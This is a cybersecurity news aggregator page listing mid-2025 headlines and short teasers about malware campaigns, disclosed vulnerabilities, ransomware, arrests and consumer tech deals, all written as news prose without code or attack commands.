Cybersecurity News

About This Website

Welcome to our cybersecurity news aggregator! This website gathers news articles from over 60 sources, providing you with a comprehensive and up-to-date overview of the latest happenings in the world of cybersecurity.

We utilize RSS feeds to collect the news, ensuring a streamlined and efficient process. This enables you to stay informed and access a wide variety of perspectives and insights in one convenient location.

Dive into the latest cybersecurity stories and explore the wealth of knowledge available, all in one place.

Cybersecurity News

SocGholish Malware Spread via Ad Tools; Delivers Access to LockBit, Evil Corp, and Others

The threat actors behind the SocGholish malware have been observed leveraging Traffic Distribution Systems (TDSs) like Parrot TDS and Keitaro TDS to filter and redirect unsuspecting users to sketchy content. "The core of their operation is a sophisticated Malware-as-a-Service (MaaS) model, where infected systems are sold as initial access points to other cybercriminal organizations," Silent Push

Webinar: How to Stop Python Supply Chain Attacks—and the Expert Tools You Need

Python is everywhere in modern software. From machine learning models to production microservices, chances are your code—and your business—depends on Python packages you didn’t write. But in 2025, that trust comes with a serious risk. Every few weeks, we’re seeing fresh headlines about malicious packages uploaded to the Python Package Index (PyPI)—many going undetected until after they’ve caused

Malicious Go, npm Packages Deliver Cross-Platform Malware, Trigger Remote Data Wipes

Cybersecurity researchers have discovered a set of 11 malicious Go packages that are designed to download additional payloads from remote servers and execute them on both Windows and Linux systems. "At runtime the code silently spawns a shell, pulls a second-stage payload from an interchangeable set of .icu and .tech command-and-control (C2) endpoints, and executes it in memory," Socket security

The AI-Powered Security Shift: What 2025 Is Teaching Us About Cloud Defense

Now that we are well into 2025, cloud attacks are evolving faster than ever and artificial intelligence (AI) is both a weapon and a shield. As AI rapidly changes how enterprises innovate, security teams are now tasked with a triple burden: Secure AI embedded in every part of the business. Use AI to defend faster and smarter. Fight AI-powered threats that execute in minutes—or seconds. Security

Microsoft Discloses Exchange Server Flaw Enabling Silent Cloud Access in Hybrid Setups

Microsoft has released an advisory for a high-severity security flaw affecting on-premise versions of Exchange Server that could allow an attacker to gain elevated privileges under certain conditions. The vulnerability, tracked as CVE-2025-53786, carries a CVSS score of 8.0. Dirk-jan Mollema with Outsider Security has been acknowledged for reporting the bug. "In an Exchange hybrid deployment, an

6,500 Axis Servers Expose Remoting Protocol; 4,000 in U.S. Vulnerable to Exploits

Cybersecurity researchers have disclosed multiple security flaws in video surveillance products from Axis Communications that, if successfully exploited, could expose them to takeover attacks. "The attack results in pre-authentication remote code execution on Axis Device Manager, a server used to configure and manage fleets of cameras, and the Axis Camera Station, client software used to view

SonicWall Confirms Patched Vulnerability Behind Recent VPN Attacks, Not a Zero-Day

SonicWall has revealed that the recent spike in activity targeting its Gen 7 and newer firewalls with SSL VPN enabled is related to an older, now-patched bug and password reuse. "We now have high confidence that the recent SSL VPN activity is not connected to a zero-day vulnerability," the company said. "Instead, there is a significant correlation with threat activity related to CVE-2024-40766."

Researchers Uncover ECScape Flaw in Amazon ECS Enabling Cross-Task Credential Theft

Cybersecurity researchers have demonstrated an "end-to-end privilege escalation chain" in Amazon Elastic Container Service (ECS) that could be exploited by an attacker to conduct lateral movement, access sensitive data, and seize control of the cloud environment. The attack technique has been codenamed ECScape by Sweet Security researcher Naor Haziz, who presented the findings today at the

Fake VPN and Spam Blocker Apps Tied to VexTrio Used in Ad Fraud, Subscription Scams

The malicious ad tech purveyor known as VexTrio Viper has been observed developing several malicious apps that have been published on Apple and Google's official app storefronts under the guise of seemingly useful applications. These apps masquerade as VPNs, device "monitoring" apps, RAM cleaners, dating services, and spam blockers, DNS threat intelligence firm Infoblox said in an exhaustive

AI Slashes Workloads for vCISOs by 68% as SMBs Demand More – New Report Reveals

As the volume and sophistication of cyber threats and risks grow, cybersecurity has become mission-critical for businesses of all sizes. To address this shift, SMBs have been urgently turning to vCISO services to keep up with escalating threats and compliance demands. A recent report by Cynomi has found that a full 79% of MSPs and MSSPs see high demand for vCISO services among SMBs. How are

Microsoft Launches Project Ire to Autonomously Classify Malware Using AI Tools

Microsoft on Tuesday announced an autonomous artificial intelligence (AI) agent that can analyze and classify software without assistance in an effort to advance malware detection efforts. The large language model (LLM)-powered autonomous malware classification system, currently a prototype, has been codenamed Project Ire by the tech giant. The system "automates what is considered the gold

Trend Micro Confirms Active Exploitation of Critical Apex One Flaws in On-Premise Systems

Trend Micro has released mitigations to address critical security flaws in on-premise versions of Apex One Management Console that it said have been exploited in the wild. The vulnerabilities (CVE-2025-54948 and CVE-2025-54987), both rated 9.4 on the CVSS scoring system, have been described as management console command injection and remote code execution flaws. "A vulnerability in Trend Micro

CERT-UA Warns of HTA-Delivered C# Malware Attacks Using Court Summons Lures

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks carried out by a threat actor called UAC-0099 targeting government agencies, the defense forces, and enterprises of the defense-industrial complex in the country. The attacks, which leverage phishing emails as an initial compromise vector, are used to deliver malware families like MATCHBOIL, MATCHWOK, and

AI Is Transforming Cybersecurity Adversarial Testing - Pentera Founder’s Vision

When Technology Resets the Playing Field

In 2015 I founded a cybersecurity testing software company with the belief that automated penetration testing was not only possible, but necessary. At the time, the idea was often met with skepticism, but today, with 1,200+ enterprise customers and thousands of users, that vision has proven itself. But I also know that what we’ve built so far is only

CISA Adds 3 D-Link Vulnerabilities to KEV Catalog Amid Active Exploitation Evidence

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added three old security flaws impacting D-Link Wi-Fi cameras and video recorders to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation in the wild. The high-severity vulnerabilities, which are from 2020 and 2022, are listed below - CVE-2020-25078 (CVSS score: 7.5) - An

ClickFix Malware Campaign Exploits CAPTCHAs to Spread Cross-Platform Infections

A combination of propagation methods, narrative sophistication, and evasion techniques enabled the social engineering tactic known as ClickFix to take off the way it did over the past year, according to new findings from Guardio Labs. "Like a real-world virus variant, this new 'ClickFix' strain quickly outpaced and ultimately wiped out the infamous fake browser update scam that plagued the web

Google’s August Patch Fixes Two Qualcomm Vulnerabilities Exploited in the Wild

Google has released security updates to address multiple security flaws in Android, including fixes for two Qualcomm bugs that were flagged as actively exploited in the wild. The vulnerabilities include CVE-2025-21479 (CVSS score: 8.6) and CVE-2025-27038 (CVSS score: 7.5), both of which were disclosed alongside CVE-2025-21480 (CVSS score: 8.6), by the chipmaker back in June 2025. CVE-2025-21479

Cursor AI Code Editor Vulnerability Enables RCE via Malicious MCP File Swaps Post Approval

Cybersecurity researchers have disclosed a high-severity security flaw in the artificial intelligence (AI)-powered code editor Cursor that could result in remote code execution. The vulnerability, tracked as CVE-2025-54136 (CVSS score: 7.2), has been codenamed MCPoison by Check Point Research, owing to the fact that it exploits a quirk in the way the software handles modifications to Model

Misconfigurations Are Not Vulnerabilities: The Costly Confusion Behind Security Risks

In SaaS security conversations, “misconfiguration” and “vulnerability” are often used interchangeably. But they’re not the same thing. And misunderstanding that distinction can quietly create real exposure. This confusion isn’t just semantics. It reflects a deeper misunderstanding of the shared responsibility model, particularly in SaaS environments where the line between vendor and customer

How Top CISOs Save Their SOCs from Alert Chaos to Never Miss Real Incidents

Why do SOC teams still drown in alerts even after spending big on security tools? False positives pile up, stealthy threats slip through, and critical incidents get buried in the noise. Top CISOs have realized the solution isn’t adding more and more tools to SOC workflows but giving analysts the speed and visibility they need to catch real attacks before they cause damage. Here’s how

15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign

Cybersecurity researchers have lifted the veil on a widespread malicious campaign that's targeting TikTok Shop users globally with an aim to steal credentials and distribute trojanized apps. "Threat actors are exploiting the official in-app e-commerce platform through a dual attack strategy that combines phishing and malware to target users," CTM360 said. "The core tactic involves a deceptive

SonicWall Investigating Potential SSL VPN Zero-Day After 20+ Targeted Attacks Reported

SonicWall said it's actively investigating reports to determine if there is a new zero-day vulnerability following reports of a spike in Akira ransomware actors in late July 2025. "Over the past 72 hours, there has been a notable increase in both internally and externally reported cyber incidents involving Gen 7 SonicWall firewalls where SSLVPN is enabled," the network security vendor said in a

NVIDIA Triton Bugs Let Unauthenticated Attackers Execute Code and Hijack AI Servers

A newly disclosed set of security flaws in NVIDIA's Triton Inference Server for Windows and Linux, an open-source platform for running artificial intelligence (AI) models at scale, could be exploited to take over susceptible servers. "When chained together, these flaws can potentially allow a remote, unauthenticated attacker to gain complete control of the server, achieving remote code execution

Vietnamese Hackers Use PXA Stealer, Hit 4,000 IPs and Steal 200,000 Passwords Globally

Cybersecurity researchers are calling attention to a new wave of campaigns distributing a Python-based information stealer called PXA Stealer. The malicious activity has been assessed to be the work of Vietnamese-speaking cybercriminals who monetize the stolen data through a subscription-based underground ecosystem that automates the resale and reuse via Telegram APIs, according to a joint

⚡ Weekly Recap: VPN 0-Day, Encryption Backdoor, AI Malware, macOS Flaw, ATM Hack & More

Malware isn’t just trying to hide anymore—it’s trying to belong. We’re seeing code that talks like us, logs like us, even documents itself like a helpful teammate. Some threats now look more like developer tools than exploits. Others borrow trust from open-source platforms, or quietly build themselves out of AI-written snippets. It’s not just about being malicious—it’s about being believable.

Man-in-the-Middle Attack Prevention Guide

Some of the most devastating cyberattacks don’t rely on brute force, but instead succeed through stealth. These quiet intrusions often go unnoticed until long after the attacker has disappeared. Among the most insidious are man-in-the-middle (MITM) attacks, where criminals exploit weaknesses in communication protocols to silently position themselves between two unsuspecting parties

New ‘Plague’ PAM Backdoor Exposes Critical Linux Systems to Silent Credential Theft

Cybersecurity researchers have flagged a previously undocumented Linux backdoor dubbed Plague that has managed to evade detection for a year. "The implant is built as a malicious PAM (Pluggable Authentication Module), enabling attackers to silently bypass system authentication and gain persistent SSH access," Nextron Systems researcher Pierre-Henri Pezier said. Pluggable Authentication Modules

The Wild West of Shadow IT

Everyone’s an IT decision-maker now. The employees in your organization can install a plugin with just one click, and they don’t need to clear it with your team first. It’s great for productivity, but it’s a serious problem for your security posture. When the floodgates of SaaS and AI opened, IT didn’t just get democratized; its security got outpaced. Employees are onboarding apps faster than

PlayPraetor Android Trojan Infects 11,000+ Devices via Fake Google Play Pages and Meta Ads

Cybersecurity researchers have discovered a nascent Android remote access trojan (RAT) called PlayPraetor that has infected more than 11,000 devices, primarily across Portugal, Spain, France, Morocco, Peru, and Hong Kong. "The botnet's rapid growth, which now exceeds 2,000 new infections per week, is driven by aggressive campaigns focusing on Spanish and French speakers, indicating a strategic

CL-STA-0969 Installs Covert Malware in Telecom Networks During 10-Month Espionage Campaign

Telecommunications organizations in Southeast Asia have been targeted by a state-sponsored threat actor known as CL-STA-0969 to facilitate remote control over compromised networks. Palo Alto Networks Unit 42 said it observed multiple incidents in the region, including one aimed at critical telecommunications infrastructure between February and November 2024. The attacks are characterized by the

Akira Ransomware Exploits SonicWall VPNs in Likely Zero-Day Attack on Fully-Patched Devices

SonicWall SSL VPN devices have become the target of Akira ransomware attacks as part of a newfound surge in activity observed in late July 2025. "In the intrusions reviewed, multiple pre-ransomware intrusions were observed within a short period of time, each involving VPN access through SonicWall SSL VPNs," Arctic Wolf Labs researcher Julian Tuin said in a report. The cybersecurity company

Cursor AI Code Editor Fixed Flaw Allowing Attackers to Run Commands via Prompt Injection

Cybersecurity researchers have disclosed a now-patched, high-severity security flaw in Cursor, a popular artificial intelligence (AI) code editor, that could result in remote code execution (RCE). The vulnerability, tracked as CVE-2025-54135 (CVSS score: 8.6), has been addressed in version 1.3 released on July 29, 2025. It has been codenamed CurXecute by Aim Labs, which previously disclosed

Attackers Use Fake OAuth Apps with Tycoon Kit to Breach Microsoft 365 Accounts

Cybersecurity researchers have detailed a new cluster of activity where threat actors are impersonating enterprises with fake Microsoft OAuth applications to facilitate credential harvesting as part of account takeover attacks. "The fake Microsoft 365 applications impersonate various companies, including RingCentral, SharePoint, Adobe, and Docusign," Proofpoint said in a Thursday report. The

AI-Generated Malicious npm Package Drains Solana Funds from 1,500+ Before Takedown

Cybersecurity researchers have flagged a malicious npm package that was generated using artificial intelligence (AI) and concealed a cryptocurrency wallet drainer. The package, @kodane/patch-manager, claims to offer "advanced license validation and registry optimization utilities for high-performance Node.js applications." It was uploaded to npm by a user named "Kodane" on July 28, 2025. The

You Are What You Eat: Why Your AI Security Tools Are Only as Strong as the Data You Feed Them

Just as triathletes know that peak performance requires more than expensive gear, cybersecurity teams are discovering that AI success depends less on the tools they deploy and more on the data that powers them.

The junk food problem in cybersecurity

Imagine a triathlete who spares no expense on equipment—carbon fiber bikes, hydrodynamic wetsuits, precision GPS watches—but fuels their

Storm-2603 Deploys DNS-Controlled Backdoor in Warlock and LockBit Ransomware Attacks

The threat actor linked to the exploitation of the recently disclosed security flaws in Microsoft SharePoint Server is using a bespoke command-and-control (C2) framework called AK47 C2 (also spelled ak47c2) in its operations. The framework includes at least two different types of clients, HTTP-based and Domain Name System (DNS)-based, which have been dubbed AK47HTTP and AK47DNS, respectively, by

Secret Blizzard Deploys Malware in ISP-Level AitM Attacks on Moscow Embassies

The Russian nation-state threat actor known as Secret Blizzard has been observed orchestrating a new cyber espionage campaign targeting foreign embassies located in Moscow by means of an adversary-in-the-middle (AitM) attack at the Internet Service Provider (ISP) level and delivering a custom malware dubbed ApolloShadow. "ApolloShadow has the capability to install a trusted root certificate to

Experts Detect Multi-Layer Redirect Tactic Used to Steal Microsoft 365 Login Credentials

Cybersecurity researchers have disclosed details of a new phishing campaign that conceals malicious payloads by abusing link wrapping services from Proofpoint and Intermedia to bypass defenses. "Link wrapping is designed by vendors like Proofpoint to protect users by routing all clicked URLs through a scanning service, allowing them to block known malicious destinations at the moment of click,"

N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto

The North Korea-linked threat actor known as UNC4899 has been attributed to attacks targeting two different organizations by approaching their employees via LinkedIn and Telegram. "Under the guise of freelance opportunities for software development work, UNC4899 leveraged social engineering techniques to successfully convince the targeted employees to execute malicious Docker containers in their

AI-Driven Trends in Endpoint Security: What the 2025 Gartner® Magic Quadrant™ Reveals

Cyber threats and attacks like ransomware continue to increase in volume and complexity with the endpoint typically being the most sought after and valued target. With the rapid expansion and adoption of AI, it is more critical than ever to ensure the endpoint is adequately secured by a platform capable of not just keeping pace, but staying ahead of an ever-evolving threat landscape.

UNC2891 Breaches ATM Network via 4G Raspberry Pi, Tries CAKETAP Rootkit for Fraud

The financially motivated threat actor known as UNC2891 has been observed targeting Automatic Teller Machine (ATM) infrastructure using a 4G-equipped Raspberry Pi as part of a covert attack. The cyber-physical attack involved the adversary leveraging their physical access to install the Raspberry Pi device and have it connected directly to the same network switch as the ATM, effectively placing

Alert Fatigue, Data Overload, and the Fall of Traditional SIEMs

Security Operations Centers (SOCs) are stretched to their limits. Log volumes are surging, threat landscapes are growing more complex, and security teams are chronically understaffed. Analysts face a daily battle with alert noise, fragmented tools, and incomplete data visibility. At the same time, more vendors are phasing out their on-premises SIEM solutions, encouraging migration to SaaS

Hackers Exploit Critical WordPress Theme Flaw to Hijack Sites via Remote Plugin Install

Threat actors are actively exploiting a critical security flaw in "Alone – Charity Multipurpose Non-profit WordPress Theme" to take over susceptible sites. The vulnerability, tracked as CVE-2025-5394, carries a CVSS score of 9.8. Security researcher Thái An has been credited with discovering and reporting the bug. According to Wordfence, the shortcoming relates to an arbitrary file upload

Hackers Use Facebook Ads to Spread JSCEAL Malware via Fake Cryptocurrency Trading Apps

Cybersecurity researchers are calling attention to an ongoing campaign that distributes fake cryptocurrency trading apps to deploy a compiled V8 JavaScript (JSC) malware called JSCEAL that can capture data such as credentials and wallets. The activity leverages thousands of malicious advertisements posted on Facebook in an attempt to redirect unsuspecting victims to counterfeit sites that

FunkSec Ransomware Decryptor Released Free to Public After Group Goes Dormant

Cybersecurity experts have released a decryptor for a ransomware strain called FunkSec, allowing victims to recover access to their files for free. "Because the ransomware is now considered dead, we released the decryptor for public download," Gen Digital researcher Ladislav Zezula said. FunkSec, which emerged towards the end of 2024, has claimed 172 victims, according to data from

Product Walkthrough: A Look Inside Pillar's AI Security Platform

In this article, we will provide a brief overview of Pillar Security's platform to better understand how they are tackling AI security challenges. Pillar Security is building a platform to cover the entire software development and deployment lifecycle with the goal of providing trust in AI systems. Using its holistic approach, the platform introduces new ways of detecting AI threats, beginning

Apple Patches Safari Vulnerability Also Exploited as Zero-Day in Google Chrome

Apple on Tuesday released security updates for its entire software portfolio, including a fix for a vulnerability that Google said was exploited as a zero-day in the Chrome web browser earlier this month. The vulnerability, tracked as CVE-2025-6558 (CVSS score: 8.8), is an incorrect validation of untrusted input in the browser's ANGLE and GPU components that could result in a sandbox escape via

Critical Dahua Camera Flaws Enable Remote Hijack via ONVIF and File Upload Exploits

Cybersecurity researchers have disclosed now-patched critical security flaws in the firmware of Dahua smart cameras that, if left unaddressed, could allow attackers to hijack control of susceptible devices. "The flaws, affecting the device's ONVIF protocol and file upload handlers, allow unauthenticated attackers to execute arbitrary commands remotely, effectively taking over the device,"

Chinese Firms Linked to Silk Typhoon Filed 15+ Patents for Cyber Espionage Tools

Chinese companies linked to the state-sponsored hacking group known as Silk Typhoon (aka Hafnium) have been identified as behind over a dozen technology patents, shedding light on the shadowy cyber contracting ecosystem and its offensive capabilities. The patents cover forensics and intrusion tools that enable encrypted endpoint data collection, Apple device forensics, and remote access to

Google Launches DBSC Open Beta in Chrome and Enhances Patch Transparency via Project Zero

Google has announced that it's making available a security feature called Device Bound Session Credentials (DBSC) in open beta to ensure that users are safeguarded against session cookie theft attacks. DBSC, first introduced as a prototype in April 2024, is designed to bind authentication sessions to a device so as to prevent threat actors from using stolen cookies to sign in to victims'

Who Got Arrested in the Raid on the XSS Crime Forum?

On July 22, 2025, the European police agency Europol said a long-running investigation led by the French Police resulted in the arrest of a 38-year-old administrator of XSS, a Russian-language cybercrime forum with more than 50,000 members. The action has triggered an ongoing frenzy of speculation and panic among XSS denizens about the identity of the unnamed suspect, but the consensus is that he is a pivotal figure in the crime forum scene who goes by the hacker handle "Toha." Here's a deep dive on what's knowable about Toha, and a short stab at who got nabbed.

Scammers Unleash Flood of Slick Online Gaming Sites

Fraudsters are flooding Discord and other social media platforms with ads for hundreds of polished online gaming and wagering websites that lure people with free credits and eventually abscond with any cryptocurrency funds deposited by players. Here's a closer look at the social engineering tactics and remarkable traits of this sprawling network of more than 1,200 scam sites.

Phishers Target Aviation Execs to Scam Customers

KrebsOnSecurity recently heard from a reader whose boss's email account got phished and was used to trick one of the company's customers into sending a large payment to scammers. An investigation into the attacker's infrastructure points to a long-running Nigerian cybercrime group that is actively targeting established companies in the transportation and aviation industries.

Microsoft Fix Targets Attacks on SharePoint Zero-Day

On Sunday, July 20, Microsoft Corp. issued an emergency security update for a vulnerability in SharePoint Server that is actively being exploited to compromise vulnerable organizations. The patch comes amid reports that malicious hackers have used the SharePoint flaw to breach U.S. federal and state agencies, universities, and energy companies.

Poor Passwords Tattle on AI Hiring Bot Maker Paradox.ai

Security researchers recently revealed that the personal information of millions of people who applied for jobs at McDonald's was exposed after they guessed the password ("123456") for the fast food chain's account at Paradox.ai, a company that makes artificial intelligence-based hiring chatbots used by many Fortune 500 companies. Paradox.ai said the security oversight was an isolated incident that did not affect its other customers, but recent security breaches involving its employees in Vietnam tell a more nuanced story.

DOGE Denizen Marko Elez Leaked API Key for xAI

Marko Elez, a 25-year-old employee at Elon Musk's Department of Government Efficiency (DOGE), has been granted access to sensitive databases at the U.S. Social Security Administration, the Treasury and Justice departments, and the Department of Homeland Security. So it should fill all Americans with a deep sense of confidence to learn that Mr. Elez over the weekend inadvertently published a private key that allowed anyone to interact directly with more than four dozen large language models (LLMs) developed by Musk's artificial intelligence company xAI.

UK Arrests Four in ‘Scattered Spider’ Ransom Group

Authorities in the United Kingdom this week arrested four alleged members of "Scattered Spider," a prolific data theft and extortion group whose recent victims include multiple airlines and the U.K. retail chain Marks & Spencer.

Microsoft Patch Tuesday, July 2025 Edition

Microsoft today released updates to fix at least 137 security vulnerabilities in its Windows operating systems and supported software. None of the weaknesses addressed this month are known to be actively exploited, but 14 of the flaws earned Microsoft's most-dire "critical" rating, meaning they could be exploited to seize control over vulnerable Windows PCs with little or no help from users.

Big Tech’s Mixed Response to U.S. Treasury Sanctions

In May 2025, the U.S. government sanctioned a Chinese national for operating a cloud provider linked to the majority of virtual currency investment scam websites reported to the FBI. But more than a month later, the accused continues to openly operate accounts at a slew of American tech companies, including Facebook, Github, LinkedIn, PayPal and Twitter/X.

Senator Chides FBI for Weak Advice on Mobile Security

Agents with the Federal Bureau of Investigation (FBI) briefed Capitol Hill staff recently on hardening the security of their mobile devices, after a contacts list stolen from the personal phone of the White House Chief of Staff Susie Wiles was reportedly used to fuel a series of text messages and phone calls impersonating her to U.S. lawmakers. But in a letter this week to the FBI, one of the Senate's most tech-savvy lawmakers says the feds aren't doing enough to recommend more appropriate security protections that are already built into most consumer mobile devices.

China Accuses Nvidia of Putting Backdoors into Their Chips

The government of China has accused Nvidia of inserting a backdoor into their H20 chips:

China’s cyber regulator on Thursday said it had held a meeting with Nvidia over what it called “serious security issues” with the company’s artificial intelligence chips. It said US AI experts had “revealed that Nvidia’s computing chips have location tracking and can remotely shut down the technology.”

The Semiconductor Industry and Regulatory Compliance

Earlier this week, the Trump administration narrowed export controls on advanced semiconductors ahead of US-China trade negotiations. The administration is increasingly relying on export licenses to allow American semiconductor firms to sell their products to Chinese customers, while keeping the most powerful of them out of the hands of our military adversaries. These are the chips that power the artificial intelligence research fueling China’s technological rise, as well as the advanced military equipment underpinning Russia’s invasion of Ukraine...

Surveilling Your Children with AirTags

Skechers is making a line of kid’s shoes with a hidden compartment for an AirTag.

First Sentencing in Scheme to Help North Koreans Infiltrate US Companies

An Arizona woman was sentenced to eight-and-a-half years in prison for her role helping North Korean workers infiltrate US companies by pretending to be US workers.

From an article:

According to court documents, Chapman hosted the North Korean IT workers’ computers in her own home between October 2020 and October 2023, creating a so-called “laptop farm” which was used to make it appear as though the devices were located in the United States.

The North Koreans were hired as remote software and application developers with multiple Fortune 500 companies, including an aerospace and defense company, a major television network, a Silicon Valley technology company, and a high-profile company...

Friday Squid Blogging: A Case of Squid Fossil Misidentification

What scientists thought were squid fossils were actually arrow worms.

Spying on People Through Airportr Luggage Delivery Service

Airportr is a service that allows passengers to have their luggage picked up, checked, and delivered to their destinations. As you might expect, it’s used by wealthy or important people. So if the company’s website is insecure, you’d be able to spy on lots of wealthy or important people. And maybe even steal their luggage.

Researchers at the firm CyberX9 found that simple bugs in Airportr’s website allowed them to access virtually all of those users’ personal information, including travel plans, or even gain administrator privileges that would have allowed a hacker to redirect or steal luggage in transit. Among even the small sample of user data that the researchers reviewed and shared with WIRED they found what appear to be the personal information and travel records of multiple government officials and diplomats from the UK, Switzerland, and the US...

Cheating on Quantum Computing Benchmarks

Peter Gutmann and Stephan Neuhaus have a new paper—I think it’s new, even though it has a March 2025 date—that makes the argument that we shouldn’t trust any of the quantum factorization benchmarks, because everyone has been cooking the books:

Similarly, quantum factorisation is performed using sleight-of-hand numbers that have been selected to make them very easy to factorise using a physics experiment and, by extension, a VIC-20, an abacus, and a dog. A standard technique is to ensure that the factors differ by only a few bits that can then be found using a simple search-based approach that has nothing to do with factorisation…. Note that such a value would never be encountered in the real world since the RSA key generation process typically requires that |p-q| > 100 or more bits [9]. As one analysis puts it, “Instead of waiting for the hardware to improve by yet further orders of magnitude, researchers began inventing better and better tricks for factoring numbers by exploiting their hidden structure” [10]...

Measuring the Attack/Defense Balance

“Who’s winning on the internet, the attackers or the defenders?”

I’m asked this all the time, and I can only ever give a qualitative hand-wavy answer. But Jason Healey and Tarang Jain’s latest Lawfare piece has amassed data.

The essay provides the first framework for metrics about how we are all doing collectively—and not just how an individual network is doing. Healey wrote to me in email:

The work rests on three key insights: (1) defenders need a framework (based in threat, vulnerability, and consequence) to categorize the flood of potentially relevant security metrics; (2) trends are what matter, not specifics; and (3) to start, we should avoid getting bogged down in collecting data and just use what’s already being reported by amazing teams at Verizon, Cyentia, Mandiant, IBM, FBI, and so many others...

Aeroflot Hacked

Looks serious.

That Time Tom Lehrer Pranked the NSA

Bluesky thread. Here’s the paper, from 1957. Note reference 3.

These Sony headphones are a fan favorite - and they're on sale at Amazon at a new low price

The widely loved Sony WH-1000XM4 headphones are currently $152 off.

Android phone feeling slow? How I changed one setting to instantly double the speed

A few taps and a swipe are all it takes to have your Android phone run in double time - sort of.

I used Perplexity to make a restaurant reservation - now I'm wondering if Google is holding us back

The newest AI tool connects directly to OpenTable, so you don't have to navigate between apps or tabs to book tables.

This free ChatGPT feature flew under the radar - but it's a game changer

Everyone can use ChatGPT's Advanced Voice Mode now - yes, even free users.

Microsoft rolls out GPT-5 across its Copilot suite - here's what we know

GPT-5 is here, and Microsoft is integrating it into everything from chatbots to developer tools. Here's what's new, what works, and what to expect.

I replaced my Sonos soundbar for one with detachable rear speakers - and it's worth it

The JBL Bar 1000MK2 is a theater-in-a-box, and although its main selling point may sound counterintuitive, it works better than you'd think.

Five iOS 26 features I already can't live without - and how to access them

Available as both a developer beta and a public beta, iOS 26 offers a host of cool new features and enhancements. These are my favorites.

How AI-enabled autonomous business will change the way you work forever

True autonomous business may be a long way off - here's why smart business leaders are preparing now.

A Linux terminal app for native Android development? Here's why I'm bullish

Although Android already has a sandboxed Linux terminal available, this Google model will be geared toward developers.

17 iOS settings I changed to instantly improve my iPhone battery life

Struggling to make your iPhone last all day? Don't rush to upgrade or replace the battery just yet. Try changing these iOS settings first to avoid that dreaded 1%.

Grab the 55-inch Samsung Odyssey Ark on sale and get a free smart monitor - here's how

Right now, you can save $1,200 on the Odyssey Ark monitor at Samsung, plus a free 32-inch M50D smart monitor and two years of Samsung Care+ for just $1.

Beware of promptware: How researchers broke into Google Home via Gemini

This was just a demonstration, but you can take steps to protect yourself from similar promptware attacks.

Dashlane ends free subscriptions - you have one month to upgrade or switch

If you store your passwords in a Dashlane Free account, you're about to lose that subscription. In a year, you lose all your data. Here are your options.

Finally, a Windows laptop that I wouldn't mind putting away my MacBook Pro for

The newest Asus ProArt P16 is an impressive upgrade from its predecessor, making it one of the most powerful Windows laptops available for creative professionals.

These midrange Bose headphones are on sale for $130 off - act fast before the deal ends

Bose's QuietComfort Headphones provide powerful noise cancellation and a comfortable fit. Every color option has been discounted.

Just installed iOS 18.6 on your iPhone? I'd change these 11 settings ASAP

Tweak these settings to optimize your iPhone - and get better performance, battery life, and privacy.

I took over 500 photos with the Samsung S25 Ultra and Oppo Find X8 Ultra - the winner is very clear

I carried both the Samsung Galaxy S25 Ultra and the Oppo Find X8 Ultra on my trip to Sweden, but I'll pick only one of these phones for my next vacation.

ChatGPT can now talk nerdy to you - plus more personalities and other upgrades beyond GPT-5

GPT-5 is a big deal, but don't underestimate the power of these smaller feature upgrades - especially new access to Advanced Voice Mode for free users.

Sign up for T-Mobile 5G home internet and get $300 back - here's how

Need an affordable home internet plan? Right now at T-Mobile, when you add or sign up for a new All-In 5G home internet plan, you'll get a $300 rebate.

TP-Link's new Wi-Fi 7 router is a travel-friendly option that won't break the bank

The latest TP-Link BE3600 router is compact enough to fit in your pocket and connects all your devices to a single Wi-Fi network.

French Telecom Firm Bouygues Says Data Breach Affects 6.4M Customers

Bouygues has been targeted in a cyberattack that resulted in the personal information of millions of customers getting compromised.

SonicWall Says Recent Attacks Don’t Involve Zero-Day Vulnerability

SonicWall has been investigating reports about a zero-day potentially being exploited in ransomware attacks, but found no evidence of a new vulnerability. 

Black Hat USA 2025 – Summary of Vendor Announcements (Part 3)

Many companies are showcasing their products and services this week at the 2025 edition of the Black Hat conference in Las Vegas.

Air France, KLM Say Hackers Accessed Customer Data

Airlines Air France and KLM have disclosed a data breach stemming from unauthorized access to a third-party platform.

Organizations Warned of Vulnerability in Microsoft Exchange Hybrid Deployment

CISA and Microsoft have issued advisories for CVE-2025-53786, a high-severity flaw allowing privilege escalation in cloud environments. 

New HTTP Request Smuggling Attacks Impacted CDNs, Major Orgs, Millions of Websites

A desync attack method leveraging HTTP/1.1 vulnerabilities impacted many websites and earned researchers more than $200,000 in bug bounties.

Major Enterprise AI Assistants Can Be Abused for Data Theft, Manipulation

Zenity has shown how AI assistants such as ChatGPT, Copilot, Cursor, Gemini, and Salesforce Einstein can be abused using specially crafted prompts.

Enterprise Secrets Exposed by CyberArk Conjur Vulnerabilities

CyberArk has patched several vulnerabilities that could be chained for unauthenticated remote code execution.

Google Discloses Data Breach via Salesforce Hack

A Google Salesforce instance may have been targeted as part of a ShinyHunters campaign that hit several major companies. 

PLoB: A Behavioral Fingerprinting Framework to Hunt for Malicious Logins

Splunk researchers developed a system to fingerprint post-logon behavior, using AI to find subtle signals of intrusion.

Prohibition never works, but that didn't stop the UK's Online Safety Act

Will someone think of the deals politicians are making?

Opinion  You might think, since I write about tech all the time, my degrees are in computer science. Nope. I'm a bona fide, degreed historian, which is why I can say with confidence that the UK's recently passed Online Safety Act is doomed to fail.…

Why blow up satellites when you can just hack them?

A pair of German researchers showed how easy it is

Black Hat  Four countries have now tested anti-satellite missiles (the US, China, Russia, and India), but it's much easier and cheaper just to hack them.…

German security researchers say 'Windows Hell No' to Microsoft biometrics for biz

Hello loophole could let a rogue admin, or a pwned one, inject new facial scans

Black Hat  Microsoft is pushing hard for Windows users to shift from using passwords to its Hello biometrics system, but researchers sponsored by the German government have found a critical flaw in its business implementation.…

Microsoft, CISA warn yet another Exchange server bug can lead to 'total domain compromise'

No reported in-the-wild exploits…yet

Microsoft and the feds late Wednesday sounded the alarm on another high-severity bug in Exchange Server hybrid deployments that could allow attackers to escalate privileges from on-premises Exchange to the cloud.…

Black Hat's network ops center brings rivals together for a common cause

The Reg goes behind the scenes of the conference NOC, where volunteers 'look for a needle in a needle stack'

Black Hat  Neil "Grifter" Wyler is spending the week "looking for a needle in a needle stack," a task he'll perform from the network operations center (NOC) that powers the Black Hat security conference in Las Vegas.…

